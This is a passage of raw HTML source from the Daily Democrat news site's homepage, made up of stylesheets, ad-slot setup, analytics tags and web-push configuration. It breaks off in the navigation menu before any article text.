auto;-ms-flex-order:1;order:1}}@media (max-width:49.9375em){.nav-primary .icon-search{margin-left:auto}}@media (min-width:65em){.nav-primary .icon-search{color:var(--primary);display:block;position:absolute;right:.625em;top:.54167em}}.nav-primary .icon-hamburger{margin:0 .625em 0 0}@media (max-width:64.9375em){.nav-primary .icon-hamburger{-ms-flex-order:2;order:2}}.pushnav li>a{font:normal 700 1.125em/1 Lato,Helvetica,sans-serif}.pushnav .menu-item-has-children:not(.nav-alt-links){height:3.25em}.pushnav .menu-item-has-children:not(.nav-alt-links)>a{height:2.88889em}.pushnav .menu-item-has-children:not(.nav-alt-links)>ul a{font:normal 600 1em/1 Lato,Helvetica,sans-serif}.status-bar{height:5em;left:27.8125em;padding:.625em .3125em;position:absolute;top:-5.3125em;z-index:7}.status-bar ul{border-left:1px solid #c8c4c0;display:-ms-flexbox;display:flex;-ms-flex-direction:column;flex-direction:column;-ms-flex-pack:distribute;justify-content:space-around;padding-left:.625em;-ms-flex-wrap:wrap;flex-wrap:wrap}.status-bar ul li{font:normal 400 .6875em/1.45455 Lato,Helvetica,sans-serif;line-height:1;text-transform:uppercase}.status-bar a{padding:.71429em}.status-bar .status-bar-wrapper,.status-bar ul{height:100%}li.menu-item.status-button.status-subscribe{margin-left:10%;background-color:var(--primary);padding-top:9px;padding-bottom:9px;color:#fff;text-align:center;font:normal 600 .9375em/1.73333 Lato,Helvetica,sans-serif}li.menu-item.status-button.status-subscribe>a{color:#fff;text-align:center;width:100%}@media screen and (max-width:1140px){li.menu-item.status-button.status-subscribe{display:none}}.trending-bar{bottom:-1.0625em;position:absolute;width:100vw}@media (min-width:65em) and (max-width:79.9375em){.trending-bar{width:calc(100vw - 1.25em);left:.625em}}.trending-bar nav{float:none;padding:.5em 0}@media (min-width:65em){.trending-bar ul{-ms-flex-align:center;align-items:center;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;height:1.125em;-ms-flex-pack:start;justify-content:flex-start;overflow:hidden}}.trending-bar li{line-height:1.15;padding-right:1.5625em;position:relative}.trending-bar a{color:#484642;font-family:Lato,Helvetica,sans-serif}.trending-bar .trending-bar-wrapper p,.trending-bar a{font-size:.9375em}.trending-bar .trending-bar-wrapper{-ms-flex-align:center;align-items:center;display:-ms-flexbox;display:flex;padding:0 .3125em}@media (min-width:80em){.trending-bar .trending-bar-wrapper{max-width:80em}}.trending-bar .trending-bar-wrapper>p{color:var(--primary);display:block;font-size:.875em;padding-right:1.5625em;position:static;text-transform:uppercase;min-width:130px}.feature-primary .newsletter-simple{text-align:center}.dfp-ad.dfp-top_leaderboard{width:100vw;background-color:#f5f3f0;padding:.3125em 0 .0625em;margin-left:-.625em}@media (min-width:80em){.dfp-ad.dfp-top_leaderboard{margin-left:calc((80em - 100vw) / 2)}}.dfp-ad.dfp-top_leaderboard>*{margin-bottom:0}.search-form.header-search{margin-top:0}.search-form.header-search input[type=text]{border-color:#c8c4c0;background-color:#fff;font-size:.9375em;padding:.75em}.feature-primary{margin-top:2em}.feature-primary .sidebar-ad-container{display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-ms-flex-direction:column;flex-direction:column}@media (min-width:20em) and (max-width:49.9375em){.feature-primary .sidebar-ad-container{margin:2em 0 0;width:100%}}.feature-primary .sidebar-ad-container .dfm-sidebar-top-flex-container{margin-top:1em}.feature-primary .primary-related-title{font:normal 600 .75em/1.25 Lora,Helvetica,sans-serif;border-bottom:1px solid #c8c4c0;color:#9d9a98;margin-bottom:.75em;padding-bottom:.25em;text-align:left}.feature-primary .primary-related{list-style:disc;list-style-position:outside;margin-left:1rem;text-align:left;font-size:.625em}.feature-primary .primary-related article{display:-ms-inline-flexbox;display:inline-flex}.feature-primary .primary-related li{margin-bottom:.4375em;position:relative}.feature-primary .primary-related li a{font:normal 600 .875em/1.14286 Lora,Helvetica,sans-serif;letter-spacing:-.01em;display:inline}.feature-primary .primary-related li time{display:inline;line-height:1.875em;font-size:.6875em;margin-top:.125em}.feature-primary .primary-related time{font:normal 400 .75em/1.5 Lato,Helvetica,sans-serif;color:#c8c4c0}.feature-primary .primary-related .headline-only .entry-title{font-size:.875em;line-height:1.357142857}</style> <script type="text/javascript"> !function(a){"use strict";a.loadCSS=function(b,c,d){var g,e=a.document,f=e.createElement("link");if(c)g=c;else{var h=(e.body||e.getElementsByTagName("head")[0]).childNodes;g=h[h.length-1]}var i=e.styleSheets;f.rel="stylesheet",f.href=b,f.media="only x",g.parentNode.insertBefore(f,c?g:g.nextSibling);var j=function(a){for(var b=f.href,c=i.length;c--;)if(i[c].href===b)return a();setTimeout(function(){j(a)})};return f.onloadcssdefined=j,j(function(){f.media=d||"all"}),f},"undefined"!=typeof module&&(module.exports=a.loadCSS)}(this); loadCSS('https://assets.digitalfirstmedia.com/prod/static/css/measuredvibrant.fc85b60dcd65e12a3e60.css'); </script> <link rel='dns-prefetch' href='//ajax.googleapis.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//assets.digitalfirstmedia.com' /> <link rel='dns-prefetch' href='//s.ntv.io' /> <link rel='dns-prefetch' href='//prodmg2.blob.core.windows.net' /> <link rel='dns-prefetch' href='//c.go-fet.ch' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Daily Democrat &raquo; Feed" href="https://www.dailydemocrat.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Daily Democrat &raquo; Comments Feed" href="https://www.dailydemocrat.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.dailydemocrat.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='all-css-0' href='https://www.dailydemocrat.com/_static/??-eJx9T1sKAjEMvJA1+Fj9EvEo3TRqMG2XJovs7Q0q+AK/kplJZhi4DgFrMSoGg4wnLgrKRuEDpMgyJcoVWzRQi8YIqK5iIyrzzGXucAbuxgVlTKR3PbEa9FLxEoT7Ftvk35PQx8d3fjrmUKrxkdGDanlafbN/PZwaYlOS6W39uUZhHyGPr7oN4ZAUoirZIzjXnoVCTGdSzw2PAq7s827RddvlplusVzfgRHtj' type='text/css' media='all' /> <link crossorigin="anonymous" rel='stylesheet' id='mason-fonts-css' href='https://fonts.googleapis.com/css?family=Droid+Sans%3A400%2C700%7CDroid+Serif%3A400%2C400i%2C700%2C700i&#038;ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='all-css-2' href='https://www.dailydemocrat.com/wp-content/mu-plugins/jetpack/css/jetpack.css?m=1557436187g' type='text/css' media='all' /> <style>.headroom--not-top .logo a{ background-image: url( https://www.dailydemocrat.com/wp-content/uploads/2018/08/WDD4_PL.svg ); }</style><script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var adLayersDFP = {"layerDebugLabel":"Current ad layer","consoleDebugLabel":"Switch to Google console","adUnitPrefix":"div-gpt-ad-"}; /* ]]> */ </script> <script type='text/javascript'> /* <![CDATA[ */ var adLayersAdServer = {"jsAPIClass":"AdLayersDFPAPI"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.dailydemocrat.com/_static/??-eJzTLy/QTc7PK0nNK9EvyClNz8wr1k9M0c1JrEwtKtbPQuLopqQV6GUV6+gTrQOo2j7X1tDU1NTC0sLMzDwLAKyDJtM='></script> <script type='text/javascript' src='https://www.gstatic.com/firebasejs/5.7.0/firebase-app.js?ver=5.2'></script> <script type='text/javascript' src='https://www.gstatic.com/firebasejs/5.7.0/firebase-messaging.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var webpush_config = {"apiKey":"AIzaSyA7p21Vh0SKdpq2XYdh0lvtmqwbUs-anAo","projectId":"first-fortress-692","messagingSenderId":"750139345540","secret":"LReXvGspgiDprxfXDKZg","vapidKey":"BOa9uRXw3qTnb656DxnJnkAAs3BYasQYIkUnnAgKrdxhRzSwSl7l_EYgNlFYTxHhAGiUyIxwPCpMbpOo4Ex357w","debug":"false"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.dailydemocrat.com/wp-content/plugins/dfm-notifications/js/webpush.js?m=1556829525g'></script> <script type="text/javascript" id="scriptMg2Widget" src="https://prodmg2.blob.core.windows.net/newsletterwidget/mng/dfm/MG2Widget-newsletterwidget-nojquery.min.js"></script><script type='text/javascript'> /* <![CDATA[ */ var MG2 = {"settings":{"environment":"prod","version":"mng","loadAttempts":null,"blockAttempts":null,"xCode":"","randomURLChoosing":false,"plugins":[{"name":"NXT","required":false,"initOptions":{"version":"mng","environment":"prod","siteCode":"MNG","configCode":"NorcalProdWP","clientCode":"mng","debug":false,"silentmode":false,"attr":"WD","settingsKey":"NORCAL,WD"}},{"name":"FP","required":true,"initOptions":{"version":"1.0","environment":"prod"}},{"name":"DL","required":true,"initOptions":{"version":"mng","environment":"prod","tagManager":"GTM","containerId":"GTM-NFD2QGD","collectors":["connext"]}}]}}; /* ]]> */ </script> <script type='text/javascript' src='https://www.dailydemocrat.com/wp-content/plugins/loader-wp-v.1.0/static/loader.min.js?ver=1.0.0'></script> <script type='text/javascript'> (function( MG2, MG2Loader ) { if ( 'undefined' !== typeof MG2 && 'undefined' !== typeof MG2Loader) { MG2Loader.init( MG2.settings ); } })( MG2, MG2Loader ); </script> <link rel='https://api.w.org/' href='https://www.dailydemocrat.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.dailydemocrat.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.dailydemocrat.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <link rel='shortlink' href='https://wp.me/aheFg' /> <link rel="manifest" href="https://www.dailydemocrat.com/wp-content/plugins/dfm-notifications/js/manifest.json"> <style> .getty.aligncenter { text-align: center; } .getty.alignleft { float: none; margin-right: 0; } .getty.alignleft > div { float: left; margin-right: 5px; } .getty.alignright { float: none; margin-left: 0; } .getty.alignright > div { float: right; margin-left: 5px; } </style> <!-- BEGIN wp-parsely Plugin Version 1.14 --> <meta name="wp-parsely_version" id="wp-parsely_version" content="1.14"/> <script type="application/ld+json"> {"@context":"http:\/\/schema.org","@type":"WebPage","mainEntityOfPage":{"@type":"WebPage","@id":"http:\/\/www.dailydemocrat.com\/2019\/05\/16\/uc-workers-to-strike-thursday-over-outsourcing-of-jobs\/"},"headline":"Daily Democrat","url":"https:\/\/www.dailydemocrat.com","thumbnailUrl":"https:\/\/www.dailydemocrat.com\/wp-content\/uploads\/2019\/05\/0515_BUS_OCR-L-STRIKE.jpg","image":{"@type":"ImageObject","url":"https:\/\/www.dailydemocrat.com\/wp-content\/uploads\/2019\/05\/0515_BUS_OCR-L-STRIKE.jpg"},"dateCreated":"2019-05-16T16:21:44Z","datePublished":"2019-05-16T16:21:44Z","dateModified":"2019-05-16T16:21:44Z","articleSection":"Business","author":[{"@type":"Person","name":"Kevin Smith"}],"creator":["Kevin Smith"],"keywords":[],"publisher":{"@type":"Organization","name":"Daily Democrat","logo":{"@type":"ImageObject","url":""}},"publication":"Daily Democrat"} </script> <!-- END wp-parsely Plugin Version 1.14 --> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <style type='text/css'>img#wpstats{display:none}</style> <script async src="//js-sec.indexww.com/ht/p/185707-192819229389900.js"></script> <script async="async" src="https://www.googletagservices.com/tag/js/gpt.js"></script> <script type='text/javascript'> var dfpAdUnits = {}; var googletag = googletag || {}; googletag.cmd = googletag.cmd || []; </script> <script type="text/javascript"> var ranNum = Math.floor(Math.random()*101); var ranRPN = ranNum.toString(); </script><script> function DetectDevice( userAgent ) { userAgent = userAgent.toLowerCase(); if( RegExp( "ipod" ).test( userAgent ) || RegExp( "iphone" ).test( userAgent ) ) { return "phone"; } else if( RegExp( "ipad" ).test( userAgent ) ) { return "tablet"; } else if( RegExp( "android" ).test( userAgent ) ) { if( RegExp( "mobile" ).test( userAgent ) ) { return "phone"; } return "tablet"; } else if( ( RegExp( "win" ).test( userAgent ) && ! RegExp( "compatible" ).test( userAgent ) ) || RegExp( "linux" ).test( userAgent ) || RegExp( "mac" ).test( userAgent ) ){ return "desktop"; } return "unknown"; } var dcatValue = DetectDevice( navigator.userAgent ); </script><script type="text/javascript"> function getParameterByName( dfmName, dfmUrl ) { if ( typeof dfmUrl === "undefined") { dfmUrl = window.location.href; } dfmName = dfmName.replace( /[\[\]]/g, "\$&" ); var regex = new RegExp( "[?&]" + dfmName + "(=([^&#]*)|&|#|$)" ); var dfmResults = regex.exec( dfmUrl ); if ( !dfmResults ) return ''; if ( !dfmResults[ 2 ] ) return ''; var dfmResult = decodeURIComponent( dfmResults[2].replace(/\+/g, " ") ); if( dfmResult.length > 15 ) return ''; for( var x = 0; x < dfmResult.length; x++ ) { var charCode = dfmResult.charCodeAt( x ); if ( ! ( ( 'a'.charCodeAt( 0 ) <= charCode && charCode <= 'z'.charCodeAt( 0 ) ) || ( 'A'.charCodeAt( 0 ) <= charCode && charCode <= 'z'.charCodeAt( 0 ) ) || ( '0'.charCodeAt( 0 ) <= charCode && charCode <= '9'.charCodeAt( 0 ) ) ) ) { return ''; } } return dfmResult; } var adTest = getParameterByName( "adtest" ); </script> <script type="text/javascript"> var dfpBuiltMappings = {}, dfpAdUnits = {}; googletag.cmd.push(function() { dfpBuiltMappings["interstitial"] = googletag.sizeMapping().addSize([1000,200],[[1,1]]).addSize([750,200],[[1,1]]).addSize([300,200],[[1,1]]).build(); dfpBuiltMappings["Sponsorship_1"] = googletag.sizeMapping().addSize([1000,200],[[300,50]]).addSize([750,200],[[300,50]]).build(); dfpBuiltMappings["top_leaderboard"] = googletag.sizeMapping().addSize([1000,200],[[728,90],[970,90],[970,250],[970,30]]).addSize([750,200],[[728,90]]).addSize([300,200],[[300,50],[320,100],[320,50]]).build(); dfpBuiltMappings["Cube1_RRail_ATF"] = googletag.sizeMapping().addSize([1000,200],[[300,250],[300,600],[300,1050]]).addSize([750,200],[[300,250]]).addSize([300,200],[[300,250]]).build(); dfpBuiltMappings["Sponsorship_2"] = googletag.sizeMapping().addSize([1000,200],[[1280,250],[970,250],[970,90],[728,90]]).addSize([750,200],[[1280,250],[728,90]]).addSize([300,200],[[1280,250],[320,50],[300,50]]).build(); dfpBuiltMappings["Cube2_RRail_mid"] = googletag.sizeMapping().addSize([1000,200],[[300,250]]).addSize([750,200],[[300,250]]).addSize([300,200],[[300,250]]).build(); dfpBuiltMappings["bottom_leaderboard"] = googletag.sizeMapping().addSize([1000,200],[[728,90],[970,90],[970,250]]).addSize([750,200],[[728,90]]).addSize([300,200],[[320,100],[320,50],[300,50]]).build(); dfpBuiltMappings["Cube3_RRail_lower"] = googletag.sizeMapping().addSize([1000,200],[[300,250]]).addSize([750,200],[[300,250]]).addSize([300,200],[[300,250]]).build(); dfpBuiltMappings["mobile_adhesion"] = googletag.sizeMapping().addSize([750,200],[[728,90]]).addSize([300,200],[[320,50],[320,100]]).build(); dfpBuiltMappings["Sponsorship_1_mobile"] = googletag.sizeMapping().addSize([300,200],[[300,50]]).build(); dfpAdUnits["interstitial"] = googletag.defineSlot("\/8013\/dailydemocrat.com\/home",[1,1],"div-gpt-ad-interstitial").defineSizeMapping(dfpBuiltMappings["interstitial"]).setTargeting("POS",["interstitial"]).setTargeting("kv",["home"]).setTargeting("RPN", ranRPN).setTargeting("rurl", [""]).setTargeting("adtest", adTest).addService(googletag.pubads()); dfpAdUnits["top_leaderboard"] = googletag.defineSlot("\/8013\/dailydemocrat.com\/home",[728,90],"div-gpt-ad-top_leaderboard").defineSizeMapping(dfpBuiltMappings["top_leaderboard"]).setTargeting("POS",["top_leaderboard"]).setTargeting("kv",["home"]).setTargeting("RPN", ranRPN).setTargeting("rurl", [""]).setTargeting("adtest", adTest).addService(googletag.pubads()); dfpAdUnits["Cube1_RRail_ATF"] = googletag.defineSlot("\/8013\/dailydemocrat.com\/home",[300,250],"div-gpt-ad-Cube1_RRail_ATF").defineSizeMapping(dfpBuiltMappings["Cube1_RRail_ATF"]).setTargeting("POS",["Cube1_RRail_ATF"]).setTargeting("kv",["home"]).setTargeting("RPN", ranRPN).setTargeting("rurl", [""]).setTargeting("adtest", adTest).addService(googletag.pubads()); dfpAdUnits["Cube2_RRail_mid"] = googletag.defineSlot("\/8013\/dailydemocrat.com\/home",[300,250],"div-gpt-ad-Cube2_RRail_mid").defineSizeMapping(dfpBuiltMappings["Cube2_RRail_mid"]).setTargeting("POS",["Cube2_RRail_mid"]).setTargeting("kv",["home"]).setTargeting("RPN", ranRPN).setTargeting("rurl", [""]).setTargeting("adtest", adTest).addService(googletag.pubads()); dfpAdUnits["Cube3_RRail_lower"] = googletag.defineSlot("\/8013\/dailydemocrat.com\/home",[300,250],"div-gpt-ad-Cube3_RRail_lower").defineSizeMapping(dfpBuiltMappings["Cube3_RRail_lower"]).setTargeting("POS",["Cube3_RRail_lower"]).setTargeting("kv",["home"]).setTargeting("RPN", ranRPN).setTargeting("rurl", [""]).setTargeting("adtest", adTest).addService(googletag.pubads()); dfpAdUnits["bottom_leaderboard"] = googletag.defineSlot("\/8013\/dailydemocrat.com\/home",[728,90],"div-gpt-ad-bottom_leaderboard").defineSizeMapping(dfpBuiltMappings["bottom_leaderboard"]).setTargeting("POS",["bottom_leaderboard"]).setTargeting("kv",["home"]).setTargeting("RPN", ranRPN).setTargeting("rurl", [""]).setTargeting("adtest", adTest).addService(googletag.pubads()); dfpAdUnits["Sponsorship_1"] = googletag.defineSlot("\/8013\/dailydemocrat.com\/home",[300,50],"div-gpt-ad-Sponsorship_1").defineSizeMapping(dfpBuiltMappings["Sponsorship_1"]).setTargeting("POS",["Sponsorship_1"]).setTargeting("kv",["home"]).setTargeting("RPN", ranRPN).setTargeting("rurl", [""]).setTargeting("adtest", adTest).addService(googletag.pubads()); dfpAdUnits["Sponsorship_1_mobile"] = googletag.defineSlot("\/8013\/dailydemocrat.com\/home",[300,50],"div-gpt-ad-Sponsorship_1_mobile").defineSizeMapping(dfpBuiltMappings["Sponsorship_1_mobile"]).setTargeting("POS",["Sponsorship_1_mobile"]).setTargeting("kv",["home"]).setTargeting("RPN", ranRPN).setTargeting("rurl", [""]).setTargeting("adtest", adTest).addService(googletag.pubads()); dfpAdUnits["Sponsorship_2"] = googletag.defineSlot("\/8013\/dailydemocrat.com\/home",[1280,250],"div-gpt-ad-Sponsorship_2").defineSizeMapping(dfpBuiltMappings["Sponsorship_2"]).setTargeting("POS",["Sponsorship_2"]).setTargeting("kv",["home"]).setTargeting("RPN", ranRPN).setTargeting("rurl", [""]).setTargeting("adtest", adTest).addService(googletag.pubads()); dfpAdUnits["mobile_adhesion"] = googletag.defineSlot("\/8013\/dailydemocrat.com\/home",[320,50],"div-gpt-ad-mobile_adhesion").defineSizeMapping(dfpBuiltMappings["mobile_adhesion"]).setTargeting("POS",["mobile_adhesion"]).setTargeting("kv",["home"]).setTargeting("RPN", ranRPN).setTargeting("rurl", [""]).setTargeting("adtest", adTest).addService(googletag.pubads()); googletag.pubads().enableAsyncRendering(); googletag.pubads().enableSingleRequest(); googletag.pubads().collapseEmptyDivs(); googletag.pubads().disableInitialLoad(); if ( typeof AdLayersAPI === 'undefined' || ! AdLayersAPI.isDebug() ) { googletag.enableServices(); } }); var dfpSizeMapping = {"interstitial":[[[1000,200],[[1,1]]],[[750,200],[[1,1]]],[[300,200],[[1,1]]]],"Sponsorship_1":[[[1000,200],[[300,50]]],[[750,200],[[300,50]]]],"top_leaderboard":[[[1000,200],[[728,90],[970,90],[970,250],[970,30]]],[[750,200],[[728,90]]],[[300,200],[[300,50],[320,100],[320,50]]]],"Cube1_RRail_ATF":[[[1000,200],[[300,250],[300,600],[300,1050]]],[[750,200],[[300,250]]],[[300,200],[[300,250]]]],"Sponsorship_2":[[[1000,200],[[1280,250],[970,250],[970,90],[728,90]]],[[750,200],[[1280,250],[728,90]]],[[300,200],[[1280,250],[320,50],[300,50]]]],"Cube2_RRail_mid":[[[1000,200],[[300,250]]],[[750,200],[[300,250]]],[[300,200],[[300,250]]]],"bottom_leaderboard":[[[1000,200],[[728,90],[970,90],[970,250]]],[[750,200],[[728,90]]],[[300,200],[[320,100],[320,50],[300,50]]]],"Cube3_RRail_lower":[[[1000,200],[[300,250]]],[[750,200],[[300,250]]],[[300,200],[[300,250]]]],"mobile_adhesion":[[[750,200],[[728,90]]],[[300,200],[[320,50],[320,100]]]],"Sponsorship_1_mobile":[[[300,200],[[300,50]]]]}; var dfpAdLayer = {"post_id":51,"title":"Home"}; var dfpAdDetails = {"interstitial":{"path":"\/8013\/dailydemocrat.com\/home","sizes":[1,1],"targeting":{"POS":["interstitial"],"kv":["home"]}},"top_leaderboard":{"path":"\/8013\/dailydemocrat.com\/home","sizes":[728,90],"targeting":{"POS":["top_leaderboard"],"kv":["home"]}},"Cube1_RRail_ATF":{"path":"\/8013\/dailydemocrat.com\/home","sizes":[300,250],"targeting":{"POS":["Cube1_RRail_ATF"],"kv":["home"]}},"Cube2_RRail_mid":{"path":"\/8013\/dailydemocrat.com\/home","sizes":[300,250],"targeting":{"POS":["Cube2_RRail_mid"],"kv":["home"]}},"Cube3_RRail_lower":{"path":"\/8013\/dailydemocrat.com\/home","sizes":[300,250],"targeting":{"POS":["Cube3_RRail_lower"],"kv":["home"]}},"bottom_leaderboard":{"path":"\/8013\/dailydemocrat.com\/home","sizes":[728,90],"targeting":{"POS":["bottom_leaderboard"],"kv":["home"]}},"Sponsorship_1":{"path":"\/8013\/dailydemocrat.com\/home","sizes":[300,50],"targeting":{"POS":["Sponsorship_1"],"kv":["home"]}},"Sponsorship_1_mobile":{"path":"\/8013\/dailydemocrat.com\/home","sizes":[300,50],"targeting":{"POS":["Sponsorship_1_mobile"],"kv":["home"]}},"Sponsorship_2":{"path":"\/8013\/dailydemocrat.com\/home","sizes":[1280,250],"targeting":{"POS":["Sponsorship_2"],"kv":["home"]}},"mobile_adhesion":{"path":"\/8013\/dailydemocrat.com\/home","sizes":[320,50],"targeting":{"POS":["mobile_adhesion"],"kv":["home"]}}}; </script> <script> !function(a9,a,p,s,t,A,g){if(a[a9])return;function q(c,r){a[a9]._Q.push([c,r])}a[a9]={init:function(){q("i",arguments)},fetchBids:function(){q("f",arguments)},setDisplayBids:function(){},_Q:[]};A=p.createElement(s);A.async=!0;A.src=t;g=p.getElementsByTagName(s)[0];g.parentNode.insertBefore(A,g)}("apstag",window,document,"script","//c.amazon-adsystem.com/aax2/apstag.js");apstag.init({ pubID: '3391', adServer: 'googletag' }); apstag.fetchBids({ slots: [ { slotID: 'div-gpt-ad-SBB', sizes: [[970, 30], [970, 250]] }, { slotID: 'div-gpt-ad-interstitial', sizes: [[1, 1]] }, { slotID: 'div-gpt-ad-top_leaderboard', sizes: [[728, 90], [970, 90], [970, 250], [970, 30], [300, 50], [320, 50], [320, 100]] }, { slotID: 'div-gpt-ad-Cube1_RRail_ATF', sizes: [[300, 250], [300, 600], [300, 1050], [160, 600]] }, { slotID: 'div-gpt-ad-Cube2_RRail_mid', sizes: [[300, 250]] }, { slotID: 'div-gpt-ad-Cube3_RRail_lower', sizes: [[300, 250], [300, 600]] }, { slotID: 'div-gpt-ad-Cube3b_Flex', sizes: [[300, 250]] }, { slotID: 'div-gpt-ad-Cube4_BottomLine', sizes: [[300, 250]] }, { slotID: 'div-gpt-ad-Cube_Article', sizes: [[300, 250]] }, { slotID: 'div-gpt-ad-bottom_leaderboard', sizes: [[728, 90], [970, 90], [970, 250], [320, 50], [320, 100]] } ], timeout: 2e3 }, function(bids) { // Your callback method, in this example it triggers the first DFP request for googletag's disableInitialLoad integration after bids have been set googletag.cmd.push(function(){ apstag.setDisplayBids(); googletag.pubads().refresh(); }); }); </script><style></style><!-- Google Tag Manager Data Layer --> <script type='text/javascript'> analyticsEvent = function() {}; analyticsSocial = function() {}; analyticsVPV = function() {}; analyticsClearVPV = function() {}; analyticsForm = function() {}; window.dataLayer = window.dataLayer || []; dataLayer.push({ 'ga_ua' : 'UA-61435456-17', 'quantcast' : 'p-4ctCQwtnNBNs2', 'quantcast label' : 'NorthernCalifornia', 'comscore' : '6035443', 'Publisher Domain' : 'dailydemocrat.com', 'Publisher Product' : 'dailydemocrat.com', 'kv' : 'home', 'Platform' : 'WP', 'Release Version' : '5.2', 'Digital Publisher' : '', 'Section' : 'Home', 'Taxonomy1' : '', 'Taxonomy2' : '', 'Taxonomy3' : '', 'Taxonomy4' : '', 'Taxonomy5' : '', 'Publisher State' : 'NORCAL', 'Page Type' : 'home', 'User ID' : '', 'Behind Paywall' : '', 'Mobile Presentation' : 'no', 'Canonical URL' : 'https://www.dailydemocrat.com/', 'Content Title' : 'Home', 'URL' : 'https://www.dailydemocrat.com/', 'Page Title' : 'Home' }); </script> <!-- End Google Tag Manager Data Layer --> <!-- Google Tag Manager --> <script> (function(w,d,s,l,i) { w[l]=w[l]||[]; w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'}); var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:''; j.async=true; j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); }) (window,document,'script','dataLayer','GTM-TLFP4R'); </script><!-- End Google Tag Manager --> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="website" /> <meta property="og:title" content="Daily Democrat" /> <meta property="og:description" content="Woodland News: Breaking News, Sports, Business, Entertainment &amp; Woodland News" /> <meta property="og:url" content="https://www.dailydemocrat.com/2019/05/16/uc-workers-to-strike-thursday-over-outsourcing-of-jobs/" /> <meta property="og:site_name" content="Daily Democrat" /> <meta property="og:image" content="https://www.dailydemocrat.com/wp-content/uploads/2018/08/WDD-Filler-Photo.png" /> <meta property="og:image:width" content="512" /> <meta property="og:image:height" content="512" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:image" content="https://www.dailydemocrat.com/wp-content/uploads/2018/08/WDD-Filler-Photo.png" /> <!-- End Jetpack Open Graph Tags --> <link rel="icon" href="https://www.dailydemocrat.com/wp-content/uploads/2018/05/cropped-woodland-daily-democrat-icon.png?w=32" sizes="32x32" /> <link rel="icon" href="https://www.dailydemocrat.com/wp-content/uploads/2018/05/cropped-woodland-daily-democrat-icon.png?w=192" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://www.dailydemocrat.com/wp-content/uploads/2018/05/cropped-woodland-daily-democrat-icon.png?w=180" /> <meta name="msapplication-TileImage" content="https://www.dailydemocrat.com/wp-content/uploads/2018/05/cropped-woodland-daily-democrat-icon.png?w=270" /> </head> <body class="home blog wp-custom-logo"> <!-- Google Tag Manager (noscript) --> <noscript><iframe src='https://www.googletagmanager.com/ns.html?id=GTM-TLFP4R' height='0' width='0' style='display:none;visibility:hidden'></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <nav class="pushnav"> <ul id="pushnav" class="menu"><li id="menu-item-166" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-166 menu-large"><a href="https://www.dailydemocrat.com/news/">News</a> <ul class="sub-menu"> <li id="menu-item-167" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-167 menu-large"><a 